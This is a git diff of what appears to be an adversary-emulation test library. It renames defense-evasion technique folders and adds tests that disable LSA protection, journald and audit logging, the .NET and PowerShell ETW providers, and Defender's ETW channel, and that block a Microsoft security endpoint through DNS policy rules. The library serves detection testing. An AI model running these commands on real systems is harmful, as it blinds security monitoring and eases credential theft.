+New-ItemProperty -Path HKCU:\Environment -Name COMPlus_ETWEnabled -Value 0 -PropertyType "String" -Force
+```
+
+#### Cleanup Commands
+
+```powershell
+Remove-ItemProperty -Path HKCU:\Environment -Name COMPlus_ETWEnabled
+```
+### Atomic Test #74: Disable .NET Event Tracing for Windows Via Environment Variable HKLM Registry - Cmd
+
+Disables ETW for the .NET Framework by setting the COMPlus_ETWEnabled environment variable to 0 in the HKLM registry using the reg.exe utility. In order for changes to take effect a reboot might be required.
+
+**Supported Platforms:** Windows
+
+**auto_generated_guid:** `110b4281-43fe-405f-a184-5d8eaf228ebf`
+
+#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
+
+```cmd
+REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v COMPlus_ETWEnabled /t REG_SZ /d 0 /f
+```
+
+#### Cleanup Commands
+
+```cmd
+REG DELETE "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v COMPlus_ETWEnabled /f > nul 2>&1
+```
+### Atomic Test #75: Disable .NET Event Tracing for Windows Via Environment Variable HKLM Registry - PowerShell
+
+Disables ETW for the .NET Framework by setting the COMPlus_ETWEnabled environment variable to 0 in the HKLM registry using PowerShell. In order for changes to take effect a reboot might be required.
+
+**Supported Platforms:** Windows
+
+**auto_generated_guid:** `4d61779d-be7f-425c-b560-0cafb2522911`
+
+#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
+
+```powershell
+New-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" -Name COMPlus_ETWEnabled -Value 0 -PropertyType "String" -Force
+```
+
+#### Cleanup Commands
+
+```powershell
+Remove-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" -Name COMPlus_ETWEnabled
+```
+### Atomic Test #76: Block Cybersecurity communication by leveraging Windows Name Resolution Policy Table
+
+Adversaries are redirecting DNS queries to an incorrect or malicious DNS server IP, thereby blocking legitimate communications and potentially compromising the security infrastructure. This atomic test aims to respond with 127.0.0.1 when a DNS query is made for endpoint.security.microsoft.com.
+
+**Supported Platforms:** Windows
+
+**auto_generated_guid:** `1174b5df-2c33-490f-8854-f5eb80c907ca`
+
+#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
+
+```powershell
+Add-DnsClientNrptRule -Namespace ".endpoint.security.microsoft.com" -NameServers 127.0.0.1 -Comment "Silenced by Name Resolution Policy Table"
+Add-DnsClientNrptRule -Namespace "endpoint.security.microsoft.com" -NameServers 127.0.0.1 -Comment "Silenced by Name Resolution Policy Table"
+Clear-DnsClientCache
+```
+
+#### Cleanup Commands
+
+```powershell
+try {
+    # Get all current NRPT rules
+        $DnsClientNrptRules = Get-DnsClientNrptRule | Where-Object { $_.Comment -eq 'Silenced by Name Resolution Policy Table' }
+    
+    # Remove each NRPT rule
+        foreach ($rule in $DnsClientNrptRules) {
+            Remove-DnsClientNrptRule -Name $rule.Name -Force
+        }
+    
+    # Clear DNS client cache
+    Clear-DnsClientCache
+    Write-Host "All NRPT rules have been removed and the DNS cache has been cleared."
+}
+
+catch {
+    Write-Host "An error occurred: $_"
+}
+Clear-DnsClientCache
+```
diff --git a/atomics/T1562.001/T1562.001.yaml b/atomics/T1685/T1685.yaml
similarity index 82%
rename from atomics/T1562.001/T1562.001.yaml
rename to atomics/T1685/T1685.yaml
index 55e5e42d..90249c86 100644
--- a/atomics/T1562.001/T1562.001.yaml
+++ b/atomics/T1685/T1685.yaml
@@ -1,6 +1,53 @@
-attack_technique: T1562.001
-display_name: 'Impair Defenses: Disable or Modify Tools'
+attack_technique: T1685
+display_name: 'Disable or Modify Tools'
 atomic_tests:
+- name: Windows Disable LSA Protection
+  auto_generated_guid: 40075d5f-3a70-4c66-9125-f72bee87247d
+  description: |
+    The following Atomic adds a registry entry to disable LSA Protection.
+
+    The LSA controls and manages user rights information, password hashes and other important bits of information in memory. Attacker tools, such as mimikatz, rely on accessing this content to scrape password hashes or clear-text passwords. Enabling LSA Protection configures Windows to control the information stored in memory in a more secure fashion - specifically, to prevent non-protected processes from accessing that data.
+    Upon successful execution, the registry will be modified and RunAsPPL will be set to 0, disabling Lsass protection.
+    https://learn.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/configuring-additional-lsa-protection#how-to-disable-lsa-protection
+    https://blog.netwrix.com/2022/01/11/understanding-lsa-protection/
+    https://thedfirreport.com/2022/03/21/phosphorus-automates-initial-access-using-proxyshell/  
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      reg add HKLM\SYSTEM\CurrentControlSet\Control\LSA /v RunAsPPL /t REG_DWORD /d 0 /f
+    cleanup_command: |
+      reg delete HKLM\SYSTEM\CurrentControlSet\Control\LSA /v RunAsPPL /f >nul 2>&1
+    name: command_prompt
+    elevation_required: true
+- name: Disable journal logging via systemctl utility
+  auto_generated_guid: c3a377f9-1203-4454-aa35-9d391d34768f
+  description: |
+    The atomic test disables the journal logging using built-in systemctl utility
+  supported_platforms:
+  - linux
+  executor:
+    command: |
+      sudo systemctl stop systemd-journald #disables journal logging
+    cleanup_command: |
+      sudo systemctl start systemd-journald #starts journal service
+      sudo systemctl enable systemd-journald #starts journal service automatically at boot time
+    name: sh
+    elevation_required: true
+- name: Disable journal logging via sed utility
+  auto_generated_guid: 12e5551c-8d5c-408e-b3e4-63f53b03379f
+  description: |
+    The atomic test disables the journal logging by searching and replacing the "Storage" parameter to "none" within the journald.conf file, thus any new journal entries will only be temporarily available in memory and not written to disk
+  supported_platforms:
+  - linux
+  executor:
+    command: |
+      sudo sed -i 's/Storage=auto/Storage=none/' /etc/systemd/journald.conf
+    cleanup_command: |
+      sudo sed -i 's/Storage=none/Storage=auto/' /etc/systemd/journald.conf #re-enables storage of journal data
+      sudo systemctl restart systemd-journald #restart the journal service
+    name: sh
+    elevation_required: true
 - name: Disable syslog
   auto_generated_guid: 4ce786f8-e601-44b5-bfae-9ebb15a7d1c8
   description: |
@@ -246,7 +293,7 @@ atomic_tests:
     sysmon_exe:
       description: The location of the Sysmon executable from Sysinternals (ignored if sysmon.exe is found in your PATH)
       type: path
-      default: PathToAtomicsFolder\T1562.001\bin\sysmon.exe
+      default: PathToAtomicsFolder\T1685\bin\sysmon.exe
   dependency_executor_name: powershell
   dependencies:
   - description: |
@@ -1370,3 +1417,272 @@ atomic_tests:
       sysctl -w kernel.randomize_va_space=2
     name: bash
     elevation_required: true
+- name: 'Auditing Configuration Changes on Linux Host'
+  auto_generated_guid: 212cfbcf-4770-4980-bc21-303e37abd0e3
+  description: |
+    Emulates modification of auditd configuration files
+  supported_platforms:
+  - linux
+  input_arguments:
+    audisp_config_file_name:
+      description: The name of the audispd configuration file to be changed
+      type: string
+      default: audispd.conf
+    auditd_config_file_name:
+      description: The name of the auditd configuration file to be changed
+      type: string
+      default: auditd.conf
+    libaudit_config_file_name:
+      description: The name of the libaudit configuration file to be changed
+      type: string
+      default: libaudit.conf
+  executor:
+    command: |
+      sed -i '$ a #art_test_1562_006_1' /etc/audisp/#{audisp_config_file_name}
+      if [ -f "/etc/#{auditd_config_file_name}" ];
+      then sed -i '$ a #art_test_1562_006_1' /etc/#{auditd_config_file_name}
+      else sed -i '$ a #art_test_1562_006_1' /etc/audit/#{auditd_config_file_name}
+      fi 
+      sed -i '$ a #art_test_1562_006_1' /etc/#{libaudit_config_file_name}
+    cleanup_command: |
+      sed -i '$ d' /etc/audisp/#{audisp_config_file_name}
+      if [ -f "/etc/#{auditd_config_file_name}" ];
+      then sed -i '$ d' /etc/#{auditd_config_file_name}
+      else sed -i '$ d' /etc/audit/#{auditd_config_file_name}
+      fi
+      sed -i '$ d' /etc/#{libaudit_config_file_name}
+    name: bash
+    elevation_required: true
+- name: 'Auditing Configuration Changes on FreeBSD Host'
+  auto_generated_guid: cedaf7e7-28ee-42ab-ba13-456abd35d1bd
+  description: |
+    Emulates modification of auditd configuration files
+  supported_platforms:
+  - linux
+  input_arguments:
+    auditd_config_file_name:
+      description: The name of the auditd configuration file to be changed
+      type: string
+      default: audit_event
+  executor:
+    command: |
+      echo '#art_test_1562_006_1' >> /etc/security/#{auditd_config_file_name}
+    cleanup_command: |
+      sed -i "" '/#art_test_1562_006_1/d' /etc/security/#{auditd_config_file_name}
+    name: sh
+    elevation_required: true
+- name: 'Logging Configuration Changes on Linux Host'
+  auto_generated_guid: 7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c
+  description: |
+    Emulates modification of syslog configuration.
+  supported_platforms:
+  - linux
+  input_arguments:
+    syslog_config_file_name:
+      description: The name of the syslog configuration file to be changed
+      type: string
+      default: syslog.conf
+    rsyslog_config_file_name:
+      description: The name of the rsyslog configuration file to be changed
+      type: string
+      default: rsyslog.conf
+    syslog_ng_config_file_name:
+      description: The name of the syslog-ng configuration file to be changed
+      type: string
+      default: syslog-ng.conf
+  executor:
+    command: |
+      if [ -f "/etc/#{syslog_config_file_name}" ];
+      then sed -i '$ a #art_test_1562_006_2' /etc/#{syslog_config_file_name}
+      fi
+      if [ -f "/etc/#{rsyslog_config_file_name}" ];
+      then sed -i '$ a #art_test_1562_006_2' /etc/#{rsyslog_config_file_name}
+      fi
+      if [ -f "/etc/syslog-ng/#{syslog_ng_config_file_name}" ];
+      then sed -i '$ a #art_test_1562_006_2' /etc/syslog-ng/#{syslog_ng_config_file_name}
+      fi
+    cleanup_command: |
+      if [ -f "/etc/#{syslog_config_file_name}" ];
+      then sed -i '$ d' /etc/#{syslog_config_file_name}
+      fi
+      if [ -f "/etc/#{rsyslog_config_file_name}" ];
+      then sed -i '$ d' /etc/#{rsyslog_config_file_name}
+      fi
+      if [ -f "/etc/syslog-ng/#{syslog_ng_config_file_name}" ];
+      then sed -i '$ d' /etc/syslog-ng/#{syslog_ng_config_file_name}
+      fi
+    name: bash
+    elevation_required: true
+- name: 'Logging Configuration Changes on FreeBSD Host'
+  auto_generated_guid: 6b8ca3ab-5980-4321-80c3-bcd77c8daed8
+  description: |
+    Emulates modification of syslog configuration.
+  supported_platforms:
+  - linux
+  input_arguments:
+    syslog_config_file_name:
+      description: The name of the syslog configuration file to be changed
+      type: string
+      default: syslog.conf
+  executor:
+    command: |
+      if [ -f "/etc/#{syslog_config_file_name}" ];
+      then echo '#art_test_1562_006_2' >> /etc/#{syslog_config_file_name}
+      fi
+    cleanup_command: |
+      if [ -f "/etc/#{syslog_config_file_name}" ];
+      then sed -i "" '/#art_test_1562_006_2/d' /etc/#{syslog_config_file_name}
+      fi
+    name: sh
+    elevation_required: true
+
+- name: Disable Powershell ETW Provider - Windows
+  auto_generated_guid: 6f118276-121d-4c09-bb58-a8fb4a72ee84
+  description: This test was created to disable the Microsoft Powershell ETW provider by using the built-in Windows tool, logman.exe. This provider is used as a common source of telemetry in AV/EDR solutions.
+  supported_platforms:
+  - windows
+  input_arguments:
+    ps_exec_location:
+      description: Location of PSExec.
+      type: string
+      default: PathToAtomicsFolder\..\ExternalPayloads\pstools\PsExec.exe
+    session:
+      description: The session to disable.
+      type: string
+      default: EventLog-Application
+    provider:
+      description: The provider to disable.
+      type: string
+      default: Microsoft-Windows-Powershell
+  dependency_executor_name: powershell
+  dependencies:
+  - description: PSExec must be installed on the machine.
+    prereq_command: if (Test-Path "#{ps_exec_location}") {exit 0} else {exit 1}
+    get_prereq_command: |-
+      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+      Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PStools.zip"
+      expand-archive -literalpath "PathToAtomicsFolder\..\ExternalPayloads\PStools.zip" -destinationpath "PathToAtomicsFolder\..\ExternalPayloads\pstools" -force
+  executor:
+    command: cmd /c "#{ps_exec_location}" -accepteula -i -s cmd.exe /c logman update trace "#{session}" --p "#{provider}" -ets
+    cleanup_command: cmd /c "#{ps_exec_location}" -i -s cmd.exe /c logman update trace "#{session}" -p "#{provider}" -ets
+    name: powershell
+    elevation_required: true
+- name: Disable .NET Event Tracing for Windows Via Registry (cmd)
+  auto_generated_guid: 8a4c33be-a0d3-434a-bee6-315405edbd5b
+  description: Disables ETW for the .NET Framework using the reg.exe utility to update the Windows registry
+  supported_platforms:
+  - windows
+  executor:
+    command: REG ADD HKLM\Software\Microsoft\.NETFramework /v ETWEnabled /t REG_DWORD /d 0
+    cleanup_command: REG DELETE HKLM\Software\Microsoft\.NETFramework /v ETWEnabled /f > nul 2>&1
+    name: command_prompt
+    elevation_required: true
+- name: Disable .NET Event Tracing for Windows Via Registry (powershell)
+  auto_generated_guid: 19c07a45-452d-4620-90ed-4c34fffbe758
+  description: Disables ETW for the .NET Framework using PowerShell to update the Windows registry
+  supported_platforms:
+  - windows
+  executor:
+    command: New-ItemProperty -Path HKLM:\Software\Microsoft\.NETFramework -Name ETWEnabled -Value 0 -PropertyType "DWord" -Force
+    cleanup_command: REG DELETE HKLM\Software\Microsoft\.NETFramework /v ETWEnabled /f > $null 2>&1
+    name: powershell
+    elevation_required: true
+- name: LockBit Black - Disable the ETW Provider of Windows Defender -cmd
+  auto_generated_guid: f6df0b8e-2c83-44c7-ba5e-0fa4386bec41
+  description: |
+    An adversary can disable the ETW Provider of Windows Defender,
+    so nothing would be logged to Microsoft-Windows-Windows-Defender/Operational anymore.
+    https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational" /v Enabled /t REG_DWORD /d 0 /f
+    cleanup_command: |
+      reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational" /v Enabled /f >nul 2>&1
+    name: command_prompt
+    elevation_required: true
+- name: LockBit Black - Disable the ETW Provider of Windows Defender -Powershell
+  auto_generated_guid: 69fc085b-5444-4879-8002-b24c8e1a3e02
+  description: |
+    An adversary can disable the ETW Provider of Windows Defender,
+    so nothing would be logged to Microsoft-Windows-Windows-Defender/Operational anymore.
+    https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      New-ItemProperty "HKLM:\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational" -Name Enabled  -PropertyType DWord -Value 0 -Force
+    cleanup_command: |
+      Remove-ItemProperty "HKLM:\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational" -Name Enabled -Force -ErrorAction Ignore
+    name: powershell
+    elevation_required: true
+- name: Disable .NET Event Tracing for Windows Via Environment Variable HKCU Registry - Cmd
+  auto_generated_guid: fdac1f79-b833-4bab-b4a1-11b1ed676a4b
+  description: Disables ETW for the .NET Framework by setting the COMPlus_ETWEnabled environment variable to 0 in the HKCU registry using the reg.exe utility. In order for changes to take effect a logout might be required.
+  supported_platforms:
+  - windows
+  executor:
+    command: REG ADD HKCU\Environment /v COMPlus_ETWEnabled /t REG_SZ /d 0 /f
+    cleanup_command: REG DELETE HKCU\Environment /v COMPlus_ETWEnabled /f > nul 2>&1
+    name: command_prompt
+- name: Disable .NET Event Tracing for Windows Via Environment Variable HKCU Registry - PowerShell
+  auto_generated_guid: b42c1f8c-399b-47ae-8fd8-763181395fee
+  description: Disables ETW for the .NET Framework by setting the COMPlus_ETWEnabled environment variable to 0 in the HKCU registry using PowerShell. In order for changes to take effect a logout might be required.
+  supported_platforms:
+  - windows
+  executor:
+    command: New-ItemProperty -Path HKCU:\Environment -Name COMPlus_ETWEnabled -Value 0 -PropertyType "String" -Force
+    cleanup_command: Remove-ItemProperty -Path HKCU:\Environment -Name COMPlus_ETWEnabled
+    name: powershell
+- name: Disable .NET Event Tracing for Windows Via Environment Variable HKLM Registry - Cmd
+  auto_generated_guid: 110b4281-43fe-405f-a184-5d8eaf228ebf
+  description: Disables ETW for the .NET Framework by setting the COMPlus_ETWEnabled environment variable to 0 in the HKLM registry using the reg.exe utility. In order for changes to take effect a reboot might be required.
+  supported_platforms:
+  - windows
+  executor:
+    command: REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v COMPlus_ETWEnabled /t REG_SZ /d 0 /f
+    cleanup_command: REG DELETE "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v COMPlus_ETWEnabled /f > nul 2>&1
+    name: command_prompt
+    elevation_required: true
+- name: Disable .NET Event Tracing for Windows Via Environment Variable HKLM Registry - PowerShell
+  auto_generated_guid: 4d61779d-be7f-425c-b560-0cafb2522911
+  description: Disables ETW for the .NET Framework by setting the COMPlus_ETWEnabled environment variable to 0 in the HKLM registry using PowerShell. In order for changes to take effect a reboot might be required.
+  supported_platforms:
+  - windows
+  executor:
+    command: New-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" -Name COMPlus_ETWEnabled -Value 0 -PropertyType "String" -Force
+    cleanup_command: Remove-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" -Name COMPlus_ETWEnabled
+    name: powershell
+    elevation_required: true
+- name: Block Cybersecurity communication by leveraging Windows Name Resolution Policy Table
+  auto_generated_guid: 1174b5df-2c33-490f-8854-f5eb80c907ca
+  description: Adversaries are redirecting DNS queries to an incorrect or malicious DNS server IP, thereby blocking legitimate communications and potentially compromising the security infrastructure. This atomic test aims to respond with 127.0.0.1 when a DNS query is made for endpoint.security.microsoft.com.
+  supported_platforms:
+    - windows
+  executor:
+    command: |-
+      Add-DnsClientNrptRule -Namespace ".endpoint.security.microsoft.com" -NameServers 127.0.0.1 -Comment "Silenced by Name Resolution Policy Table"
+      Add-DnsClientNrptRule -Namespace "endpoint.security.microsoft.com" -NameServers 127.0.0.1 -Comment "Silenced by Name Resolution Policy Table"
+      Clear-DnsClientCache
+    cleanup_command: |-
+      try {
+          # Get all current NRPT rules
+              $DnsClientNrptRules = Get-DnsClientNrptRule | Where-Object { $_.Comment -eq 'Silenced by Name Resolution Policy Table' }
+          
+          # Remove each NRPT rule
+              foreach ($rule in $DnsClientNrptRules) {
+                  Remove-DnsClientNrptRule -Name $rule.Name -Force
+              }
+          
+          # Clear DNS client cache
+          Clear-DnsClientCache
+          Write-Host "All NRPT rules have been removed and the DNS cache has been cleared."
+      }
+
+      catch {
+          Write-Host "An error occurred: $_"
+      }
+      Clear-DnsClientCache
+    name: powershell
+    elevation_required: true
diff --git a/atomics/T1562.004/T1562.004.md b/atomics/T1686/T1686.md
similarity index 98%
rename from atomics/T1562.004/T1562.004.md
rename to atomics/T1686/T1686.md
index 8272b38b..6033e655 100644
--- a/atomics/T1562.004/T1562.004.md
+++ b/atomics/T1686/T1686.md
@@ -1,4 +1,4 @@
-# T1562.004 - Impair Defenses: Disable or Modify System Firewall
+# T1686 - Disable or Modify System Firewall
 
 ## Description from ATT&CK
 
@@ -10,7 +10,7 @@
 > 
 > In ESXi, firewall rules may be modified directly via the esxcli command line interface (e.g., via `esxcli network firewall set`) or via the vCenter user interface.(Citation: Trellix Rnasomhouse 2024)(Citation: Broadcom ESXi Firewall)
 
-[Source](https://attack.mitre.org/techniques/T1562/004)
+[Source](https://attack.mitre.org/techniques/T1686)
 
 ## Atomic Tests
 
@@ -159,7 +159,7 @@ This test will attempt to allow an executable through the system firewall locate
 
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| exe_file_path | path to exe file | path | PathToAtomicsFolder&#92;T1562.004&#92;bin&#92;AtomicTest.exe|
+| exe_file_path | path to exe file | path | PathToAtomicsFolder&#92;T1686&#92;bin&#92;AtomicTest.exe|
 
 #### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
 
@@ -758,13 +758,13 @@ Adversaries may disable the ESXI firewall via ESXCLI
 #### Attack Commands: Run with `command_prompt`!
 
 ```cmd
-#{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m PathToAtomicsFolder\..\atomics\T1562.004\src\esxi_disable_firewall.txt
+#{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m PathToAtomicsFolder\..\atomics\T1686\src\esxi_disable_firewall.txt
 ```
 
 #### Cleanup Commands
 
 ```cmd
-#{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m PathToAtomicsFolder\..\atomics\T1562.004\src\esxi_enable_firewall.txt
+#{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m PathToAtomicsFolder\..\atomics\T1686\src\esxi_enable_firewall.txt
 ```
 
 #### Dependencies: Run with `powershell`!
diff --git a/atomics/T1562.004/T1562.004.yaml b/atomics/T1686/T1686.yaml
similarity index 98%
rename from atomics/T1562.004/T1562.004.yaml
rename to atomics/T1686/T1686.yaml
index 1c59db81..6fd2df5e 100644
--- a/atomics/T1562.004/T1562.004.yaml
+++ b/atomics/T1686/T1686.yaml
@@ -1,5 +1,5 @@
-attack_technique: T1562.004
-display_name: 'Impair Defenses: Disable or Modify System Firewall'
+attack_technique: T1686
+display_name: 'Disable or Modify System Firewall'
 atomic_tests:
 - name: Disable Microsoft Defender Firewall
   auto_generated_guid: 88d05800-a5e4-407e-9b53-ece4174f197f
@@ -79,7 +79,7 @@ atomic_tests:
     exe_file_path:
       description: path to exe file
       type: path
-      default: PathToAtomicsFolder\T1562.004\bin\AtomicTest.exe
+      default: PathToAtomicsFolder\T1686\bin\AtomicTest.exe
   executor:
     command: |
       Copy-Item "#{exe_file_path}" -Destination "C:\Users\$env:UserName" -Force
@@ -473,9 +473,9 @@ atomic_tests:
       Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"
   executor:
     command: |
-      #{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m PathToAtomicsFolder\..\atomics\T1562.004\src\esxi_disable_firewall.txt
+      #{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m PathToAtomicsFolder\..\atomics\T1686\src\esxi_disable_firewall.txt
     cleanup_command: |
-      #{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m PathToAtomicsFolder\..\atomics\T1562.004\src\esxi_enable_firewall.txt
+      #{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m PathToAtomicsFolder\..\atomics\T1686\src\esxi_enable_firewall.txt
     name: command_prompt
     elevation_required: false
 - name: Set a firewall rule using New-NetFirewallRule
diff --git a/atomics/T1562.004/bin/AtomicTest.exe b/atomics/T1686/bin/AtomicTest.exe
similarity index 100%
rename from atomics/T1562.004/bin/AtomicTest.exe
rename to atomics/T1686/bin/AtomicTest.exe
diff --git a/atomics/T1562.004/src/esxi_disable_firewall.txt b/atomics/T1686/src/esxi_disable_firewall.txt
similarity index 100%
rename from atomics/T1562.004/src/esxi_disable_firewall.txt
rename to atomics/T1686/src/esxi_disable_firewall.txt
diff --git a/atomics/T1562.004/src/esxi_enable_firewall.txt b/atomics/T1686/src/esxi_enable_firewall.txt
similarity index 100%
rename from atomics/T1562.004/src/esxi_enable_firewall.txt
rename to atomics/T1686/src/esxi_enable_firewall.txt
diff --git a/atomics/T1562.009/T1562.009.md b/atomics/T1688/T1688.md
similarity index 94%
rename from atomics/T1562.009/T1562.009.md
rename to atomics/T1688/T1688.md
index d4539d56..96006adb 100644
--- a/atomics/T1562.009/T1562.009.md
+++ b/atomics/T1688/T1688.md
@@ -1,4 +1,4 @@
-# T1562.009 - Impair Defenses: Safe Boot Mode
+# T1688 - Safe Mode Boot
 
 ## Description from ATT&CK
 
@@ -8,7 +8,7 @@
 > 
 > Adversaries may also add their malicious applications to the list of minimal services that start in safe mode by modifying relevant Registry values (i.e. [Modify Registry](https://attack.mitre.org/techniques/T1112)). Malicious [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) objects may also be registered and loaded in safe mode.(Citation: Sophos Snatch Ransomware 2019)(Citation: CyberArk Labs Safe Mode 2016)(Citation: Cybereason Nocturnus MedusaLocker 2020)(Citation: BleepingComputer REvil 2021)
 
-[Source](https://attack.mitre.org/techniques/T1562/009)
+[Source](https://attack.mitre.org/techniques/T1688)
 
 ## Atomic Tests
 
diff --git a/atomics/T1562.009/T1562.009.yaml b/atomics/T1688/T1688.yaml
similarity index 84%
rename from atomics/T1562.009/T1562.009.yaml
rename to atomics/T1688/T1688.yaml
index f8111d44..16d62ec0 100644
--- a/atomics/T1562.009/T1562.009.yaml
+++ b/atomics/T1688/T1688.yaml
@@ -1,5 +1,5 @@
-attack_technique: T1562.009
-display_name: 'Impair Defenses: Safe Boot Mode'
+attack_technique: T1688
+display_name: 'Safe Mode Boot'
 atomic_tests:
 - name: Safe Mode Boot 
   auto_generated_guid: 2a78362e-b79a-4482-8e24-be397bce4d85
diff --git a/atomics/T1562.010/T1562.010.md b/atomics/T1689/T1689.md
similarity index 97%
rename from atomics/T1562.010/T1562.010.md
rename to atomics/T1689/T1689.md
index f36e70c7..f2d9075c 100644
--- a/atomics/T1562.010/T1562.010.md
+++ b/atomics/T1689/T1689.md
@@ -1,4 +1,4 @@
-# T1562.010 - Impair Defenses: Downgrade Attack
+# T1689 - Downgrade Attack
 
 ## Description from ATT&CK
 
@@ -8,7 +8,7 @@
 > 
 > Adversaries may similarly target network traffic to downgrade from an encrypted HTTPS connection to an unsecured HTTP connection that exposes network data in clear text.(Citation: Targeted SSL Stripping Attacks Are Real)(Citation: Crowdstrike Downgrade) On Windows systems, adversaries may downgrade the boot manager to a vulnerable version that bypasses Secure Boot, granting the ability to disable various operating system security mechanisms.(Citation: SafeBreach)
 
-[Source](https://attack.mitre.org/techniques/T1562/010)
+[Source](https://attack.mitre.org/techniques/T1689)
 
 ## Atomic Tests
 
@@ -77,7 +77,7 @@ An adversary will change the VIB acceptance level to CommunitySupported to downg
 | vm_user | Specify the privilege user account on ESXi Server | string | root|
 | vm_pass | Specify the privilege user password on ESXi Server | string | pass|
 | plink_file | Path to plink | path | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;plink.exe|
-| cli_script | Path to script with commands to change acceptance level | path | PathToAtomicsFolder&#92;T1562.010&#92;src&#92;esx_community_supported.txt|
+| cli_script | Path to script with commands to change acceptance level | path | PathToAtomicsFolder&#92;T1689&#92;src&#92;esx_community_supported.txt|
 
 #### Attack Commands: Run with `command_prompt`!
 
diff --git a/atomics/T1562.010/T1562.010.yaml b/atomics/T1689/T1689.yaml
similarity index 96%
rename from atomics/T1562.010/T1562.010.yaml
rename to atomics/T1689/T1689.yaml
index 4fd651fa..6fb999e2 100644
--- a/atomics/T1562.010/T1562.010.yaml
+++ b/atomics/T1689/T1689.yaml
@@ -1,5 +1,5 @@
-attack_technique: T1562.010
-display_name: 'Impair Defenses: Downgrade Attack'
+attack_technique: T1689
+display_name: 'Downgrade Attack'
 atomic_tests:
 - name: ESXi - Change VIB acceptance level to CommunitySupported via PowerCLI
   auto_generated_guid: 062f92c9-28b1-4391-a5f8-9d8ca6852091
@@ -65,7 +65,7 @@ atomic_tests:
     cli_script:
       description: Path to script with commands to change acceptance level
       type: path
-      default: PathToAtomicsFolder\T1562.010\src\esx_community_supported.txt
+      default: PathToAtomicsFolder\T1698\src\esx_community_supported.txt
   dependency_executor_name: powershell
   dependencies:
   - description: |
diff --git a/atomics/T1562.010/src/esx_community_supported.txt b/atomics/T1689/src/esx_community_supported.txt
similarity index 100%
rename from atomics/T1562.010/src/esx_community_supported.txt
rename to atomics/T1689/src/esx_community_supported.txt
diff --git a/atomics/T1562.003/T1562.003.md b/atomics/T1690/T1690.md
similarity index 99%
rename from atomics/T1562.003/T1562.003.md
rename to atomics/T1690/T1690.md
index 16d9fd74..777e00a0 100644
--- a/atomics/T1562.003/T1562.003.md
+++ b/atomics/T1690/T1690.md
@@ -1,4 +1,4 @@
-# T1562.003 - Impair Defenses: Impair Command History Logging
+# T1690 - Prevent Command History Logging
 
 ## Description from ATT&CK
 
@@ -12,7 +12,7 @@
 > 
 > Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to disable historical command logging (e.g. <code>no logging</code>).
 
-[Source](https://attack.mitre.org/techniques/T1562/003)
+[Source](https://attack.mitre.org/techniques/T1690)
 
 ## Atomic Tests
 
diff --git a/atomics/T1562.003/T1562.003.yaml b/atomics/T1690/T1690.yaml
similarity index 99%
rename from atomics/T1562.003/T1562.003.yaml
rename to atomics/T1690/T1690.yaml
index d79d24aa..e8ef1fe6 100644
--- a/atomics/T1562.003/T1562.003.yaml
+++ b/atomics/T1690/T1690.yaml
@@ -1,5 +1,5 @@
-attack_technique: T1562.003
-display_name: 'Impair Defenses: Impair Command History Logging'
+attack_technique: T1690
+display_name: 'Prevent Command History Logging'
 atomic_tests:
 - name: Disable history collection
   auto_generated_guid: 4eafdb45-0f79-4d66-aa86-a3e2c08791f5